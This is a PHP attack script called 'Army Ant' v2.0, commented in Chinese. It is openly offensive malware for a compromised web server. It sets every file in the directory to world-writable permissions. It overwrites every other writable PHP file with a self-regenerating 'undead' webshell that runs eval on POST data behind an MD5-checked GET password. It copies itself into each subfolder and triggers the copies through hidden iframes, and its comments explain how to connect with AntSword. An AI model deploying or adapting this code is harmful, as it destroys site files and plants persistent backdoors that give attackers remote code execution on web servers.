<?php
    
    error_reporting(0);     //不显示警告
    ignore_user_abort(true);
    set_time_limit(0);
    echo 'Welcome Hacker!
    The current user is ';
    $whoami = system('whoami');     //检测当前用户权限
    echo '</br>';
    $groupchange = chgrp(__FILE__,$whoami);     //将当前所有文件加入当前用户组
    $chmodchange = system('chmod -R 777 *');    //当前目录加777权限
    if ($groupchange == 1)      //检验当前文件用户组更改是否成功
    {
        echo 'These files group changed to '.$whoami.' --*SUCCESSFULLY*--';     //更改文件用户组成功
        //调用函数检测文件所属
    }
    else
    {
        echo 'Failed to change files group to current user: '.$whoami.'';       //更改文件用户组失败
    }


        //获取当前文件名字
        function this_file_name_rootfile()
        {
            $self_name_rootfile = substr($_SERVER['PHP_SELF'],strrpos($_SERVER['PHP_SELF'],'/')+1);
            return $self_name_rootfile;
        }


        //列出当前目录下所有文件以及文件夹
        $dirs_now = array();
        foreach(glob("*") as $d)
        $dirs_now[] = $d;       
        
//列出当前目录下所有文件(包括文件夹)
        function allfilename_thispath()                 
        {
            echo '*******************Files in current directory*******************';
            echo '*************************Army Ant*************************';
            global $dirs_now;
            $dir = dirname(__FILE__);
            for ($count=0;$dirs_now[$count]!=NULL;$count++)
            echo $dirs_now[$count].'';
            echo '*************************Army Ant*************************';
        }
        
        //向当前目录下的文件夹写RC
        function dir_copy($file_copy_rootfile)
        {
            global $dirs_now;
            $dir = dirname(__FILE__);
            for ($count=0;$dirs_now[$count]!=NULL;$count++)
            if (is_dir($dirs_now[$count]))
            {
                $dir_child = $dir.DIRECTORY_SEPARATOR.$dirs_now[$count];          //当前目录下文件夹的路径
                if (!file_exists($dir_child.DIRECTORY_SEPARATOR.$file_copy_rootfile))
                {
                    copy($file_copy_rootfile,$dir_child.DIRECTORY_SEPARATOR.$file_copy_rootfile);
                    echo '<iframe frameborder="0" hspace="0" vspace="0" src="'.$dirs_now[$count].DIRECTORY_SEPARATOR.$file_copy_rootfile.'" style="display:none"></iframe>';
                }
            }
            //unlink(__FILE__);//感染完当前目录下所有除开自己外其他可以感染的php文件以及文件夹后删掉自己功成身退溜之大吉逍遥法外
        }
        


        function Hack($self_write_file_name)                             //攻击函数
        {
            //攻击语句.不死马使用方法:URL-->http://xxx:port/xxx.php?08067Sec=qwerqwer123ltlt 再蚁剑连接的时候密码为 LTLT
            $HACK_CONTENT ="
            <?php
                \$self_name_rootfile = substr(\$_SERVER['PHP_SELF'],strrpos(\$_SERVER['PHP_SELF'],'/')+1);
                \$self_name_rootfile_withoutphp_num = strrpos(\$self_name_rootfile,'.');
                \$self_name_rootfile_withoutphp_str = substr(\$self_name_rootfile,0,\$self_name_rootfile_withoutphp_num);
                \$num=0;
                \$num_exist = \$num-1;
                ignore_user_abort(true);
                set_time_limit(0);
                unlink(__FILE__);
                \$file = \$self_name_rootfile_withoutphp_str.'_'.\$num.'.php';
                \$code = '<?php if(md5(\$_GET[\"08067Sec\"])==\"ebffefd3135f863d79d28f440fbdd8d4\"){@eval(\$_POST[LTLT]);} ?>';
                while (1)
                {
                    while(!file_exists(\$file_exist))
                    {
                        file_put_contents(\$file,\$code);
                        \$num++;
                        \$num_exist++;
                        \$file = \$self_name_rootfile_withoutphp_str.'_'.\$num.'.php';
                        \$file_exist = \$self_name_rootfile_withoutphp_str.'_'.\$num_exist.'.php';
                    }
                     \$code_2 = '<?php if(md5(\$_GET[\"08067Sec\"])==\"ebffefd3135f863d79d28f440fbdd8d4\"){@eval(\$_POST[LTLT]);} ?>';
                    file_put_contents(\$file_exist,\$code);
                    //system('touch -m -d \"2018-12-01 09:10:12\" .3.php');
                    usleep(3000);
                }
            ?>
                        ";
                        /**
            $HACK_CONTENT ="
            <?php phpinfo();?>
                        ";    **/
        
        global $dirs_now;
        for ($count=0;$dirs_now[$count]!=NULL;$count++)
        if ((substr(strrchr($dirs_now[$count], '.'), 1) == 'php') && $dirs_now[$count] != $self_write_file_name)
            {
                $file_hack_goal = fopen($dirs_now[$count],"w");
                fwrite($file_hack_goal,$HACK_CONTENT);
                fclose($file_hack_goal);
                echo '<iframe frameborder="0" hspace="0" vspace="0" src="'.$dirs_now[$count].'" style="display:none"></iframe>';
            }
        }
        
        //列出可写的文件
        function chmodsuccess()        
        {
            echo '**********These files or directory have permision to write**********';
            echo '*************************Army Ant*************************';
            global $dirs_now;
            for ($count=0;$dirs_now[$count] != NULL;$count++)
                {


                        $chmodfile = is_writable($dirs_now[$count]);
                        if ($chmodfile == 1)
                        {
                            echo $dirs_now[$count].'';
                        }
                    
                }
                echo '*************************Army Ant*************************';
        }
        
        
        function attack_php_goal($self_write_file_name)
        {
            echo '**************Files in These targets will be attacked**************';
            echo '*************************Army Ant*************************';
            global $dirs_now;
                        
                            for ($count=0;$dirs_now[$count] != NULL;$count++)                                                                           
                            {
                                if (is_file($dirs_now[$count]) && $dirs_now[$count] != $self_write_file_name)
                                {
                                    if (substr(strrchr($dirs_now[$count], '.'), 1) == 'php' && is_writable($dirs_now[$count]))
                                    {
                                        echo $dirs_now[$count].'';
                                    }
                                   }
                            }    
                       
            echo '*************************Army Ant*************************';
        }
        




        //先检测当前服务器win还是linux
        if (strtoupper(substr(PHP_OS,0,3))==='WIN')
        {
                echo 'The current system is WIN';
                echo 'I have not write this for WIN!';
                //这里写WIN版本的
        }
        else
        {
            echo 'The current system is '.strtoupper(substr(PHP_OS,0));
            echo '</br>';
                if (is_writable(__FILE__))
                {
                    echo 'You have permision to write in this path';
                }
                    
            //这里调用有权限写的文件的函数
            allfilename_thispath();//显示当前目录所有文件与文件夹
            chmodsuccess();//更改文件读写权限
            attack_php_goal(this_file_name_rootfile());//显示当前目录所有有权限被攻击的php文件
            Hack(this_file_name_rootfile());//向当前目录下的除了自己的所有php文件内写入不死马Pro以及唤醒他们
            dir_copy(this_file_name_rootfile());//向当前目录下的文件夹写RC并唤醒他们
            //这里调用列出可以攻击的php文件的函数
            echo '</br>';
            echo '*************************Army Ant*************************';
            echo '************************ Version 2.0 ************************';
            echo '***************** Written by 08067Sec_LTLT *****************';
           }
?>